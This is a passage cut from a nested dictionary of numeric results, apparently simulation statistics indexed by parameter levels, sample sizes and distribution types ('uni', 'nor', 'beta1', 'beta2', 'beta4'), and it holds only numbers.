{'uni': 0.06303781952610477, 'nor': 0.107566183991327, 'beta1': 0.06420595175095856, 'beta2': 0.14051764144651235, 'beta4': 0.05083566221768343}, 500: {'uni': 0.077773467688739, 'nor': 0.11742486043919942, 'beta1': 0.07700877908013115, 'beta2': 0.1511127593960866, 'beta4': 0.06280694981838986}, 400: {'uni': 0.08746277637091704, 'nor': 0.12365577953156803, 'beta1': 0.08541014292804638, 'beta2': 0.15608748317289656, 'beta4': 0.07176746331816469}, 300: {'uni': 0.09874368980037385, 'nor': 0.13279799940406578, 'beta1': 0.10063727053662885, 'beta2': 0.16469825347196948, 'beta4': 0.08447571374140178}, 200: {'uni': 0.12147398047991875, 'nor': 0.15113252491099077, 'beta1': 0.1200711704573576, 'beta2': 0.1773291927975813, 'beta4': 0.10795683062214101}, 150: {'uni': 0.1362385673420503, 'nor': 0.16821153015139878, 'beta1': 0.1413420271907294, 'beta2': 0.19069570391948212, 'beta4': 0.12371945303991366}, 100: {'uni': 0.17191169006549945, 'nor': 0.1915000329509956, 'beta1': 0.16877716420631123, 'beta2': 0.21536781735389232, 'beta4': 0.15634386366388436}, 75: {'uni': 0.19768216860175636, 'nor': 0.21811329268682084, 'beta1': 0.1944362202006149, 'beta2': 0.23468699165444767, 'beta4': 0.18438491874181984}, 50: {'uni': 0.24173902870459993, 'nor': 0.25892138695111544, 'beta1': 0.23935110326757852, 'beta2': 0.2736926533593288, 'beta4': 0.2305071196963152}, 30: {'uni': 0.3056290673196859, 'nor': 0.31961597063487057, 'beta1': 0.30685624740134015, 'beta2': 0.3314946124079916, 'beta4': 0.2962690398405605}, 20: {'uni': 0.37503602220656485, 'nor': 0.38582014314039126, 'beta1': 0.37033940847339836, 'beta2': 0.394855889549228, 'beta4': 0.3632513574058299}, 10: {'uni': 0.5219475742101427, 'nor': 0.5273558177210325, 'beta1': 0.5179563071106704, 'beta2': 0.5223280464261697, 'beta4': 0.508754397926185}}, 150: {1000: {'uni': 0.05497081944724275, 'nor': 0.11293866805236763, 'beta1': 0.054515515093092715, 'beta2': 0.14887668708582957, 'beta4': 0.0423526366673494}, 750: {'uni': 0.06272727255199112, 'nor': 0.11935685094462867, 'beta1': 0.06302161535014611, 'beta2': 0.15422727456751978, 'beta4': 0.05010677582182044}, 500: {'uni': 0.07783890547759603, 'nor': 0.12892780402185094, 'beta1': 0.07679900717257704, 'beta2': 0.1584491203937134, 'beta4': 0.06222703641019131}, 400: {'uni': 0.08619692493811398, 'nor': 0.13460267386562202, 'beta1': 0.08498682818675518, 'beta2': 0.16069418726755758, 'beta4': 0.07050071410282907}, 300: {'uni': 0.0997903074389076, 'nor': 0.1434928646404363, 'beta1': 0.09987792658944261, 'beta2': 0.1712581767153427, 'beta4': 0.08388928555633074}, 200: {'uni': 0.1229636584423498, 'nor': 0.16127335693854156, 'beta1': 0.12179318587940297, 'beta2': 0.18650787549305375, 'beta4': 0.10364099823577061}, 150: {'uni': 0.13950034070955347, 'nor': 0.17459656922463157, 'beta1': 0.13855391323541408, 'beta2': 0.19837515491552643, 'beta4': 0.12275345243127289}, 100: {'uni': 0.1721101997017661, 'nor': 0.20046992755603654, 'beta1': 0.17021665164027383, 'beta2': 0.22211280446894255, 'beta4': 0.15546389829003454}, 75: {'uni': 0.1991174934620939, 'nor': 0.22331372517586023, 'beta1': 0.1962104983206956, 'beta2': 0.24060724420863722, 'beta4': 0.17937743495141684}, 50: {'uni': 0.23946193200510502, 'nor': 0.25716770411393886, 'beta1': 0.2418907692375714, 'beta2': 0.27698760128146055, 'beta4': 0.22462197378366977}, 30: {'uni': 0.3048167499504834, 'nor': 0.3224164981392731, 'beta1': 0.30917669628791133, 'beta2': 0.3397217885796864, 'beta4': 0.2951530259916931}, 20: {'uni': 0.3730336363648902, 'nor': 0.392045571478165, 'beta1': 0.37260044052109287, 'beta2': 0.3959432577708598, 'beta4': 0.36505805948899306}, 10: {'uni': 0.5205895094295567, 'nor': 0.5200665477634308, 'beta1': 0.5169539616971102, 'beta2': 0.5378667745281579, 'beta4': 0.5122123299658353}}, 100: {1000: {'uni': 0.054671905903051154, 'nor': 0.13620477958130078, 'beta1': 0.054448380411697084, 'beta2': 0.156407609946504, 'beta4': 0.04258031568291154}, 750: {'uni': 0.06266207206914232, 'nor': 0.13888439278405296, 'beta1': 0.06271791632667584, 'beta2': 0.16566678573632287, 'beta4': 0.0482925234291825}, 500: {'uni': 0.0775012675871265, 'nor': 0.14584060351193762, 'beta1': 0.07690888604663815, 'beta2': 0.16862882144382407, 'beta4': 0.06119566013646921}, 400: {'uni': 0.08612080986238169, 'nor': 0.1524884087949958, 'beta1': 0.08594295867668089, 'beta2': 0.17546187004121272, 'beta4': 0.06890296067565604}, 300: {'uni': 0.09914477687385226, 'nor': 0.16047382364230972, 'beta1': 0.09975824624614843, 'beta2': 0.18295548537415873, 'beta4': 0.08159044925727432}, 200: {'uni': 0.12159165562809493, 'nor': 0.1749465483291479, 'beta1': 0.12382445050344149, 'beta2': 0.19490495485248804, 'beta4': 0.10001305394379784}, 150: {'uni': 0.14077933594023823, 'nor': 0.18899798332431184, 'beta1': 0.1392565038337702, 'beta2': 0.20870351777500962, 'beta4': 0.1201824703566371}, 100: {'uni': 0.17056823279090622, 'nor': 0.21428849869387473, 'beta1': 0.1691699130978257, 'beta2': 0.23043861580390712, 'beta4': 0.1516000664543985}, 75: {'uni': 0.19663636725395228, 'nor': 0.2363567433663108, 'beta1': 0.19691891448710852, 'beta2': 0.2503172522739228, 'beta4': 0.17491986059664721}, 50: {'uni': 0.23826972176926864, 'nor': 0.27685077279441733, 'beta1': 0.23825989017305044, 'beta2': 0.2868672428900947, 'beta4': 0.21882117630157366}, 30: {'uni': 0.31201675069446144, 'nor': 0.3343598643931398, 'beta1': 0.3060809831180182, 'beta2': 0.3440276319271851, 'beta4': 0.29233201067867287}, 20: {'uni': 0.3759351158966905, 'nor': 0.398490239918883, 'beta1': 0.38101245327903976, 'beta2': 0.39923128747203945, 'beta4': 0.3603116968657404}, 10: {'uni': 0.5196174604512347, 'nor': 0.5370629326824977, 'beta1': 0.5227401105260507, 'beta2': 0.5353245869799641, 'beta4': 0.5038900663854036}}, 75: {1000: {'uni': 0.05581476206336089, 'nor': 0.14996311847318278, 'beta1': 0.05365675549099019, 'beta2': 0.17055018709179848, 'beta4': 0.04193211124195961}, 750: {'uni': 0.06309942452483619, 'nor': 0.15522283922657953, 'beta1': 0.06265439072142831, 'beta2': 0.17240879861617764, 'beta4': 0.048386543332347154}, 500: {'uni': 0.07754087582450486, 'nor': 0.16332486956676168, 'beta1': 0.07743582625568735, 'beta2': 0.17781956208843652, 'beta4': 0.059938160945287436}, 400: {'uni': 0.0859009285413197, 'nor': 0.16455528208539544, 'beta1': 0.0859009551340934, 'beta2': 0.18121441364820234, 'beta4': 0.06915251664696331}, 300: {'uni': 0.09986347174843568, 'nor': 0.1761029972514011, 'beta1': 0.0985448164318779, 'beta2': 0.19063671853439235, 'beta4': 0.07940996126345179}, 200: {'uni': 0.1219446322586436, 'nor': 0.19088686764778073, 'beta1': 0.12203985328563413, 'beta2': 0.20221466589744463, 'beta4': 0.09911706486857708}, 150: {'uni': 0.14134327292980867, 'nor': 0.2075824873820286, 'beta1': 0.13918231909157353, 'beta2': 0.21544497996445033, 'beta4': 0.11793244074486325}, 100: {'uni': 0.1687636072286217, 'nor': 0.22966914010762518, 'beta1': 0.17145469012205217, 'beta2': 0.2386137561260998, 'beta4': 0.14523799945462573}, 75: {'uni': 0.19703843729601045, 'nor': 0.2452280144193495, 'beta1': 0.19774506037472683, 'beta2': 0.2578913259496163, 'beta4': 0.17331141348235535}, 50: {'uni': 0.23561918913475827, 'nor': 0.28225307485813256, 'beta1': 0.23938641208932598, 'beta2': 0.2860719183825794, 'beta4': 0.2152316198436074}, 30: {'uni': 0.3063193649262127, 'nor': 0.3405329572940864, 'beta1': 0.30716509640473844, 'beta2': 0.34335563947301895, 'beta4': 0.28587386510907925}, 20: {'uni': 0.3767551692150056, 'nor': 0.4031495423576498, 'beta1': 0.37352751762215214, 'beta2': 0.4017493254898249, 'beta4': 0.351543039258803}, 10: {'uni': 0.5135684852674217, 'nor': 0.5436208094855315, 'beta1': 0.5192701884000489, 'beta2': 0.541210448929448, 'beta4': 0.5038013131913337}}, 50: {1000: {'uni': 0.057842757890233965, 'nor': 0.176724096627361, 'beta1': 0.05408363038722486, 'beta2': 0.1893425096945247, 'beta4': 0.04177685643849072}, 750: {'uni': 0.06538542437484401, 'nor': 0.18526810074262368, 'beta1': 0.06262861062085978, 'beta2': 0.19081050404679278, 'beta4': 0.048138028850044035}, 500: {'uni': 0.0792274657176204, 'nor': 0.19075398241126212, 'beta1': 0.0781712308607096, 'beta2': 0.19703705491038603, 'beta4': 0.0588888677259701}, 400: {'uni': 0.08735181776995748, 'nor': 0.19733138997918653, 'beta1': 0.08671034907348185, 'beta2': 0.2029356394631182, 'beta4': 0.066356031342088}, 300: {'uni': 0.10038917910081224, 'nor': 0.2029037006087926, 'beta1': 0.09984458469801827, 'beta2': 0.2063407376940214, 'beta4': 0.07823225938947853}, 200: {'uni': 0.12225034725079975, 'nor': 0.21748256503914343, 'beta1': 0.12127009856496679, 'beta2': 0.21298920413518108, 'beta4': 0.09725242174322574}, 150: {'uni': 0.13784882603896337, 'nor': 0.2249234497071243, 'beta1': 0.142780623344778, 'beta2': 0.22771126781508755, 'beta4': 0.11232814682225023}, 100: {'uni': 0.1714971001027576, 'nor': 0.25130430723045216, 'beta1': 0.17149311831470596, 'beta2': 0.24575615134422085, 'beta4': 0.14352315798485257}, 75: {'uni': 0.19880624921564277, 'nor': 0.26882383206094734, 'beta1': 0.19913517567203842, 'beta2': 0.26323216252272097, 'beta4': 0.16694848958957278}, 50: {'uni': 0.24301893705195066, 'nor': 0.30053473330563535, 'beta1': 0.2437319298178, 'beta2': 0.2954722207006947, 'beta4': 0.21057399371569013}, 30: {'uni': 0.3061807816995066, 'nor': 0.3627984661916076, 'beta1': 0.30909416778391374, 'beta2': 0.35432147654309276, 'beta4': 0.28138283811427534}, 20: {'uni': 0.3762292155636904, 'nor': 0.4143457355174486, 'beta1': 0.37003582598685447, 'beta2': 0.417463947271284, 'beta4': 0.35099161339155716}, 10: {'uni': 0.5146354857060667, 'nor': 0.5544668904963077, 'beta1': 0.5140864742286797, 'beta2': 0.5502638339716877, 'beta4': 0.5028168394982335}}, 30: {1000: {'uni': 0.06167755027974642, 'nor': 0.23144501325358247, 'beta1': 0.05443549286004057, 'beta2': 0.21030902628970505, 'beta4': 0.04112353109993838}, 750: {'uni': 0.06986464831340056, 'nor': 0.23157834653825105, 'beta1': 0.06298033424844018, 'beta2': 0.216023883145685, 'beta4': 0.04803956198514081}, 500: {'uni': 0.08291783316058687, 'nor': 0.23718889406318566, 'beta1': 0.07704332442547329, 'beta2': 0.21732439854980712, 'beta4': 0.059507078517589906}, 400: {'uni': 0.09066454957494724, 'nor': 0.24292620517074537, 'beta1': 0.08498286362579072, 'beta2': 0.22266027695887336, 'beta4': 0.06609086320354882}, 300: {'uni': 0.10418406038463879, 'nor': 0.2475908290265445, 'beta1': 0.10110680990030668, 'beta2': 0.2275142158690745, 'beta4': 0.07602884420540873}, 200: {'uni': 0.12340725206644898, 'nor': 0.2577901680164382, 'beta1': 0.12378156154379666, 'beta2': 0.23814817788828757, 'beta4': 0.0942162762280091}, 150: {'uni': 0.14201468529779537, 'nor': 0.2714996335714514, 'beta1': 0.14041437088952297, 'beta2': 0.24705628359301424, 'beta4': 0.1115326221157299}, 100: {'uni': 0.17156911043689577, 'nor': 0.2910591493981809, 'beta1': 0.17229628287565757, 'beta2': 0.26827556800042573, 'beta4': 0.1379958628810278}, 75: {'uni': 0.19484440138573444, 'nor': 0.30551022793589416, 'beta1': 0.19665653140894246, 'beta2': 0.2834507380462248, 'beta4': 0.16309095353377234}, 50: {'uni': 0.2410672107187225, 'nor': 0.33499572655115767, 'beta1': 0.24405909195603415, 'beta2': 0.31230260400439824, 'beta4': 0.2051899383337094}, 30: {'uni': 0.30479652249512135, 'nor': 0.38800092181160023, 'beta1': 0.30744408184030536, 'beta2': 0.3593455522789838, 'beta4': 0.27314032884799155}, 20: {'uni': 0.37449454977510127, 'nor': 0.4460662326088321, 'beta1': 0.3700752962830209, 'beta2': 0.4167874835239967, 'beta4': 0.3384436437562991}, 10: {'uni': 0.5116314558801505, 'nor': 0.5755223794724841, 'beta1': 0.5150076058914129, 'beta2': 0.5514563941928305, 'beta4': 0.4917892863434117}}, 20: {1000: {'uni': 0.06959685300772211, 'nor': 0.28757410567549513, 'beta1': 0.053953981515175053, 'beta2': 0.23479744605814812, 'beta4': 0.04068104631305974}, 750: {'uni': 0.07583228548956522, 'nor': 0.2893885231958583, 'beta1': 0.06269020138133452, 'beta2': 0.2398017512195938, 'beta4': 0.0477206084818706}, 500: {'uni': 0.08760381160767208, 'nor': 0.2873807845879558, 'beta1': 0.07722766319523955, 'beta2': 0.24182381981064882, 'beta4': 0.05857000112490568}, 400: {'uni': 0.09700627334635992, 'nor': 0.2945018063796199, 'beta1': 0.08605947968141531, 'beta2': 0.2454067726287148, 'beta4': 0.0658297775312253}, 300: {'uni': 0.10812260594449896, 'nor': 0.3044832061482207, 'beta1': 0.09982313247817287, 'beta2': 0.25311285877382617, 'beta4': 0.07470120923689594}, 200: {'uni': 0.13067538774601684, 'nor': 0.307381114817036, 'beta1': 0.1207002057565804, 'beta2': 0.26262764232583313, 'beta4': 0.09381753824822037}, 150: {'uni': 0.1437519246686677, 'nor': 0.3206091659846585, 'beta1': 0.13867393280816304, 'beta2': 0.265394034224661, 'beta4': 0.10931783353586122}, 100: {'uni': 0.17189740592688724, 'nor': 0.3280544098249214, 'beta1': 0.16810853258661185, 'beta2': 0.2803147606488574, 'beta4': 0.13269638171126513}, 75: {'uni': 0.2003549991132838, 'nor': 0.34489520732083756, 'beta1': 0.19657825911151428, 'beta2': 0.29584161685011867, 'beta4': 0.15555948793153623}, 50: {'uni': 0.24046928357188047, 'nor': 0.3831682316031932, 'beta1': 0.24031547155678468, 'beta2': 0.3259770855267306, 'beta4': 0.19629711424440732}, 30: {'uni': 0.3080680301232709, 'nor': 0.42303226265926963, 'beta1': 0.30509121084648144, 'beta2': 0.37610727416155765, 'beta4': 0.2609876476177542}, 20: {'uni': 0.373297668166573, 'nor': 0.475814762443992, 'beta1': 0.3757648466315679, 'beta2': 0.42264940499356346, 'beta4': 0.3284256078618326}, 10: {'uni': 0.5140039283349758, 'nor': 0.5950313110777266, 'beta1': 0.5170351561226657, 'beta2': 0.555063447840049, 'beta4': 0.473618190051116}}, 10: {1000: {'uni': 0.1000131525742068, 'nor': 0.409864047721089, 'beta1': 0.09113480290581626, 'beta2': 0.2804979904810423, 'beta4': 0.04087846848948132}, 750: {'uni': 0.10360258940868095, 'nor': 0.41929372322534414, 'beta1': 0.09114741734335415, 'beta2': 0.28114038955842613, 'beta4': 0.0477679066813847}, 500: {'uni': 0.11195961020305714, 'nor': 0.4157829085773251, 'beta1': 0.09126098733586951, 'beta2': 0.28657849318925166, 'beta4': 0.058399050643070494}, 400: {'uni': 0.11729638239795848, 'nor': 0.4260504597395027, 'beta1': 0.09154740289766372, 'beta2': 0.28504911455818494, 'beta4': 0.06534589576597083}, 300: {'uni': 0.12830729394341506, 'nor': 0.4205120474737974, 'beta1': 0.10096554208890152, 'beta2': 0.2936910855153506, 'beta4': 0.075492287165148}, 200: {'uni': 0.14515187402988394, 'nor': 0.435914384534595, 'beta1': 0.12215037845816623, 'beta2': 0.2981966625105821, 'beta4': 0.09167242348680918}, 150: {'uni': 0.15934251639018754, 'nor': 0.4395473221709565, 'beta1': 0.14085779880718263, 'beta2': 0.31177123240394505, 'beta4': 0.10719443660940275}, 100: {'uni': 0.18512635552666046, 'nor': 0.4563048193604518, 'beta1': 0.16884027642286348, 'beta2': 0.3151628444983027, 'beta4': 0.12974440442356955}, 75: {'uni': 0.2071031402154928, 'nor': 0.46661064860968665, 'beta1': 0.19804032027111418, 'beta2': 0.33533567264141617, 'beta4': 0.15103905584519184}, 50: {'uni': 0.24733757785161503, 'nor': 0.48136759185068323, 'beta1': 0.2403341444387983, 'beta2': 0.3594046504015401, 'beta4': 0.1890136163469433}, 30: {'uni': 0.3069533690198551, 'nor': 0.5223418943718963, 'beta1': 0.30599677039266915, 'beta2': 0.3983639241051619, 'beta4': 0.2534266062192869}, 20: {'uni': 0.3735600858621225, 'nor': 0.5590331645199271, 'beta1': 0.3745545851840409, 'beta2': 0.44871940334430627, 'beta4': 0.309129001754901}, 10: {'uni': 0.5079603855850016, 'nor': 0.6714692142813454, 'beta1': 0.5137289273763032, 'beta2': 0.5696425643135812, 'beta4': 0.45864540314219915}}}, 0.01: {1000: {1000: {'uni': 0.05129485367689102, 'nor': 0.06281083509171664, 'beta1': 0.05107806686939176, 'beta2': 0.10147434204599137, 'beta4': 0.04481834422995701}, 750: {'uni': 0.05933719566503981, 'nor': 0.07044954783713647, 'beta1': 0.05907830933987235, 'beta2': 0.10443582378448724, 'beta4': 0.05337370850693279}, 500: {'uni': 0.07297584959697972, 'nor': 0.08154345761298731, 'beta1': 0.07271983245642422, 'beta2': 0.11266519507619366, 'beta4': 0.06585853402432429}, 400: {'uni': 0.08090786389591842, 'nor': 0.08992168016454061, 'beta1': 0.08128421415396725, 'beta2': 0.11609404475794888, 'beta4': 0.07649643394160888}, 300: {'uni': 0.09388546103833217, 'nor': 0.09955321885077567, 'beta1': 0.09345709665753016, 'beta2': 0.12649006695142406, 'beta4': 0.08841359390615178}, 200: {'uni': 0.11353626166629766, 'nor': 0.12048393062982926, 'beta1': 0.11474986795545838, 'beta2': 0.14179352445516558, 'beta4': 0.10994312621177804}, 150: {'uni': 0.1327942158900352, 'nor': 0.13672326054920736, 'beta1': 0.13088297498674817, 'beta2': 0.15495612418375992, 'beta4': 0.12759146981003233}, 100: {'uni': 0.16208800134443502, 'nor': 0.1634608738492047, 'beta1': 0.16483383061835577, 'beta2': 0.179293345468783, 'beta4': 0.15587772291645302}, 75: {'uni': 0.18573927578217658, 'nor': 0.18826509813153808, 'beta1': 0.18535362149382184, 'beta2': 0.20246761284986203, 'beta4': 0.18363587582052376}, 50: {'uni': 0.22602880452129426, 'nor': 0.22721053058692026, 'beta1': 0.22647423560537766, 'beta2': 0.24132302056400629, 'beta4': 0.22214505424144632}, 30: {'uni': 0.2866957560674456, 'nor': 0.29122835505552935, 'beta1': 0.2929636790178528, 'beta2': 0.30200243653413883, 'beta4': 0.2919094262056585}, 20: {'uni': 0.35528611293244305, 'nor': 0.35294865538334086, 'beta1': 0.35330451666561385, 'beta2': 0.3561690331631435, 'beta4': 0.3471108536518231}, 10: {'uni': 0.4898429521852865, 'nor': 0.48995064698146334, 'beta1': 0.4916404496017533, 'beta2': 0.49434298684781663, 'beta4': 0.48152800061187356}}, 750: {1000: {'uni': 0.051534656619642405, 'nor': 0.06661040036430238, 'beta1': 0.05119210087714571, 'beta2': 0.1017170167766821, 'beta4': 0.04405968156885359}, 750: {'uni': 0.059392840143921544, 'nor': 0.07295941378208323, 'beta1': 0.0593079696092893, 'beta2': 0.10498534334941645, 'beta4': 0.05213727865509954}, 500: {'uni': 0.07232105894578911, 'nor': 0.0845454668484768, 'beta1': 0.07269799849643532, 'beta2': 0.1124804653100443, 'beta4': 0.06550213106063163}, 400: {'uni': 0.08051435061250778, 'nor': 0.09174262237208586, 'beta1': 0.0814260013663316, 'beta2': 0.11733914354575858, 'beta4': 0.07417771351439317}, 300: {'uni': 0.09264055215696232, 'nor': 0.10295017205097534, 'beta1': 0.09346566052436689, 'beta2': 0.12655756797177392, 'beta4': 0.08787578197242896}, 200: {'uni': 0.11483671598870576, 'nor': 0.12366825601571851, 'beta1': 0.11322629942862356, 'beta2': 0.14042506799186272, 'beta4': 0.10722297353789534}, 150: {'uni': 0.13158644004287812, 'nor': 0.1389969192433652, 'beta1': 0.13055409411440705, 'beta2': 0.15647066832130707, 'beta4': 0.12705846586847036}, 100: {'uni': 0.16186652500083287, 'nor': 0.1673332759029187, 'beta1': 0.16128287338366937, 'beta2': 0.18038226627656384, 'beta4': 0.15611827317289068}, 75: {'uni': 0.18764543571574965, 'nor': 0.19095691792223274, 'beta1': 0.18794282479122293, 'beta2': 0.20449321398176196, 'beta4': 0.18061820709529477}, 50: {'uni': 0.226171463050115, 'nor': 0.2289935327391464, 'beta1': 0.22801373082023235, 'beta2': 0.24150428904957089, 'beta4': 0.22665004770368552}, 30: {'uni': 0.28965332928325704, 'nor': 0.29481852702352496, 'beta1': 0.29443285351219906, 'beta2': 0.30448017108169273, 'beta4': 0.2841177753703454}, 20: {'uni': 0.35303732347834804, 'nor': 0.35175872269014363, 'beta1': 0.3488588172685543, 'beta2': 0.36473759502844405, 'beta4': 0.3489149265132695}, 10: {'uni': 0.48746885638524173, 'nor': 0.48910846637687666, 'beta1': 0.4854441287384354, 'beta2': 0.499312939413207, 'beta4': 0.4820854775286469}}, 500: {1000: {'uni': 0.05070668798111183, 'nor': 0.07307564348735107, 'beta1': 0.05136358571645222, 'beta2': 0.10754414306745141, 'beta4': 0.04335466469142435}, 750: {'uni': 0.05930859802961075, 'nor': 0.07913755555471735, 'beta1': 0.058713049033531806, 'beta2': 0.11202765188630714, 'beta4': 0.05072594836982958}, 500: {'uni': 0.07250391695991487, 'nor': 0.08997714013244151, 'beta1': 0.07217245096062674, 'beta2': 0.11976047636593312, 'beta4': 0.06369794357960606}, 400: {'uni': 0.08087401871675737, 'nor': 0.09762299221558252, 'beta1': 0.08126385640568756, 'beta2': 0.12524922843485486, 'beta4': 0.07246464421624788}, 300: {'uni': 0.09286272646331206, 'nor': 0.10639090401076873, 'beta1': 0.09360831758476895, 'beta2': 0.13480385220989233, 'beta4': 0.08484641064573195}, 200: {'uni': 0.11369861261647718, 'nor': 0.1259649259062341, 'beta1': 0.11535049725347946, 'beta2': 0.15023672569159274, 'beta4': 0.10654459673560468}, 150: {'uni': 0.13094331807012105, 'nor': 0.1419771822231538, 'beta1': 0.13242263806323107, 'beta2': 0.16312614939587444, 'beta4': 0.12204776890498104}, 100: {'uni': 0.16010520707772924, 'nor': 0.16829119335024995, 'beta1': 0.161780824516852, 'beta2': 0.1845635350197833, 'beta4': 0.15500764249014892}, 75: {'uni': 0.18569722037995617, 'nor': 0.19404858222754012, 'beta1': 0.18353587169284724, 'beta2': 0.21024744989486982, 'beta4': 0.18093047276834628}, 50: {'uni': 0.2249952534487163, 'nor': 0.23470807584810854, 'beta1': 0.22394207853083203, 'beta2': 0.24369571318319788, 'beta4': 0.22404400464903013}, 30: {'uni': 0.28922639988339793, 'nor': 0.29694440849160253, 'beta1': 0.28930513852142603, 'beta2': 0.3061086815618318, 'beta4': 0.28197149415512585}, 20: {'uni': 0.3532159395936194, 'nor': 0.3594610656143175, 'beta1': 0.35424253066365413, 'beta2': 0.3629738556479084, 'beta4': 0.34892709778660913}, 10: {'uni': 0.49319776417333205, 'nor': 0.4919346045056977, 'beta1': 0.4914053992328329, 'beta2': 0.4956418018212609, 'beta4': 0.48866367027428953}}, 400: {1000: {'uni': 0.05171872696982288, 'nor': 0.0779968485408219, 'beta1': 0.05125234103750187, 'beta2': 0.10749424790797857, 'beta4': 0.04243112506333324}, 750: {'uni': 0.05942664915165613, 'nor': 0.08278471622725792, 'beta1': 0.059045226639506954, 'beta2': 0.11246496346057688, 'beta4': 0.049669130629863556}, 500: {'uni': 0.07189692356904676, 'nor': 0.09361598801023086, 'beta1': 0.0721804928498383, 'beta2': 0.11937872756887818, 'beta4': 0.06327011110935565}, 400: {'uni': 0.08084614058304584, 'nor': 0.10080942415469252, 'beta1': 0.0797135489432822, 'beta2': 0.1257152874686207, 'beta4': 0.07054543139847541}, 300: {'uni': 0.09394710441562093, 'nor': 0.10983774809278396, 'beta1': 0.09317847768978005, 'beta2': 0.13400641076171205, 'beta4': 0.08372788015883226}, 200: {'uni': 0.11516939973345491, 'nor': 0.1279698675017119, 'beta1': 0.11283277809965603, 'beta2': 0.14878256141575052, 'beta4': 0.10481300302685173}, 150: {'uni': 0.13103481700869724, 'nor': 0.14459734582575978, 'beta1': 0.13109809480602197, 'beta2': 0.1634096298903665, 'beta4': 0.1224780784738968}, 100: {'uni': 0.1610805901347358, 'nor': 0.16904015329738042, 'beta1': 0.1602232613963524, 'beta2': 0.1874426452084551, 'beta4': 0.15348776308096057}, 75: {'uni': 0.18177371768073364, 'nor': 0.19670702076359703, 'beta1': 0.1844925024391989, 'beta2': 0.2105191447384148, 'beta4': 0.17783506013311623}, 50: {'uni': 0.2252328815143954, 'nor': 0.231721726836716, 'beta1': 0.22366230144945903, 'beta2': 0.24781167529857046, 'beta4': 0.21942405296052814}, 30: {'uni': 0.28864743546145355, 'nor': 0.2970598210895456, 'beta1': 0.2893646586257687, 'beta2': 0.30151561161895035, 'beta4': 0.2852000453369167}, 20: {'uni': 0.3560880816420639, 'nor': 0.35816852147038125, 'beta1': 0.3587921441788674, 'beta2': 0.3713605213188108, 'beta4': 0.3507319434269337}, 10: {'uni': 0.48715561247362865, 'nor': 0.491578769317442, 'beta1': 0.4763429028968493, 'beta2': 0.5009132622576649, 'beta4': 0.4858863544709412}}, 300: {1000: {'uni': 0.05116236960288739, 'nor': 0.08362687693280035, 'beta1': 0.051368373495024544, 'beta2': 0.11446474352863178, 'beta4': 0.04119784019711356}, 750: {'uni': 0.05993893748144197, 'nor': 0.088975002045106, 'beta1': 0.05945536094744841, 'beta2': 0.1192867892763042, 'beta4': 0.04845162600368419}, 500: {'uni': 0.07274728302306016, 'nor': 0.09828413734395919, 'beta1': 0.07212817693643503, 'beta2': 0.12627777617615477, 'beta4': 0.06160395430770016}, 400: {'uni': 0.08073474547539339, 'nor': 0.10507281592449369, 'beta1': 0.08024944641722576, 'beta2': 0.1303092084298162, 'beta4': 0.06982921110804863}, 300: {'uni': 0.09317526758440403, 'nor': 0.11705090342781177, 'beta1': 0.09315546513078332, 'beta2': 0.1399551702427777, 'beta4': 0.08158816157237775}, 200: {'uni': 0.11409958755150595, 'nor': 0.1314488095008084, 'beta1': 0.11453286833437615, 'beta2': 0.1567790320303898, 'beta4': 0.10362462756693636}, 150: {'uni': 0.130936819362498, 'nor': 0.1493233271345169, 'beta1': 0.13150912092144829, 'beta2': 0.169701096896674, 'beta4': 0.12193228046643229}, 100: {'uni': 0.16243451017422467, 'nor': 0.1757607427080965, 'beta1': 0.160383901558243, 'beta2': 0.19244715618473562, 'beta4': 0.1514647915916582}, 75: {'uni': 0.1853859134119128, 'nor': 0.1958997856947285, 'beta1': 0.18687394388066536, 'beta2': 0.21186212806019417, 'beta4': 0.17618375652600887}, 50: {'uni': 0.22498609458966784, 'nor': 0.23730546516440537, 'beta1': 0.22564497853587992, 'beta2': 0.25068612614680547, 'beta4': 0.22025976236280248}, 30: {'uni': 0.2883890795435333, 'nor': 0.29983573055446033, 'beta1': 0.2921073149317487, 'beta2': 0.3082785804677224, 'beta4': 0.28437957017383403}, 20: {'uni': 0.350662368824897, 'nor': 0.36066581276090837, 'beta1': 0.35036112927618646, 'beta2': 0.36698531659291206, 'beta4': 0.34399861518395175}, 10: {'uni': 0.48773425736194487, 'nor': 0.4897587539768351, 'beta1': 0.48597353289535955, 'beta2': 0.5016469184252377, 'beta4': 0.48930033694496555}}, 200: {1000: {'uni': 0.05099550061354963, 'nor': 0.09621002435011294, 'beta1': 0.05097248744906935, 'beta2': 0.1270148971959001, 'beta4': 0.04066696015503554}, 750: {'uni': 0.05897057501846892, 'nor': 0.10125250087843168, 'beta1': 0.05929595778075081, 'beta2': 0.13114280729155686, 'beta4': 0.04768802094469193}, 500: {'uni': 0.07196269990769555, 'nor': 0.10929050520651495, 'beta1': 0.07283579022785935, 'beta2': 0.13763586545366968, 'beta4': 0.060027142657854}, 400: {'uni': 0.08054788114980349, 'nor': 0.11648685006536474, 'beta1': 0.0811659726275793, 'beta2': 0.14360472688257275, 'beta4': 0.06804198089690716}, 300: {'uni': 0.09360446147057411, 'nor': 0.12347797475561295, 'beta1': 0.09391365693051856, 'beta2': 0.15084726685668082, 'beta4': 0.07971992088255381}, 200: {'uni': 0.11420590046780266, 'nor': 0.13996925144507733, 'beta1': 0.11318748651513358, 'beta2': 0.1649173148462807, 'beta4': 0.10100464440514964}, 150: {'uni': 0.13159721869668134, 'nor': 0.15543417245376623, 'beta1': 0.1306662632283953, 'beta2': 0.17863248019784544, 'beta4': 0.11926356604886618}, 100: {'uni': 0.1616085474743723, 'nor': 0.18126496559108407, 'beta1': 0.16180591430502922, 'beta2': 0.20079768282663685, 'beta4': 0.14662232668007058}, 75: {'uni': 0.18466397256542888, 'nor': 0.20167396401497723, 'beta1': 0.18454565366419512, 'beta2': 0.22144937952843802, 'beta4': 0.1723673372282205}, 50: {'uni': 0.22429367090067337, 'nor': 0.2421981518299573, 'beta1': 0.22627305994598435, 'beta2': 0.25417001184524735, 'beta4': 0.21615315140042368}, 30: {'uni': 0.2891984285711773, 'nor': 0.3022022225666101, 'beta1': 0.2885857727546917, 'beta2': 0.31488071890675523, 'beta4': 0.27946891056788803}, 20: {'uni': 0.35272562205198627, 'nor': 0.3597248755608644, 'beta1': 0.34988508357633813, 'beta2': 0.37359776285196444, 'beta4': 0.3452123858638153}, 10: {'uni': 0.4934504641167673, 'nor': 0.4953893325003678, 'beta1': 0.49326648601757545, 'beta2': 0.5048531792897072, 'beta4': 0.48425541230404723}}, 150: {1000: {'uni': 0.051578990681795306, 'nor': 0.10587724278324923, 'beta1': 0.05100434131700521, 'beta2': 0.1385651893710681, 'beta4': 0.040131066622810074}, 750: {'uni': 0.05964212868791385, 'nor': 0.11070421199591629, 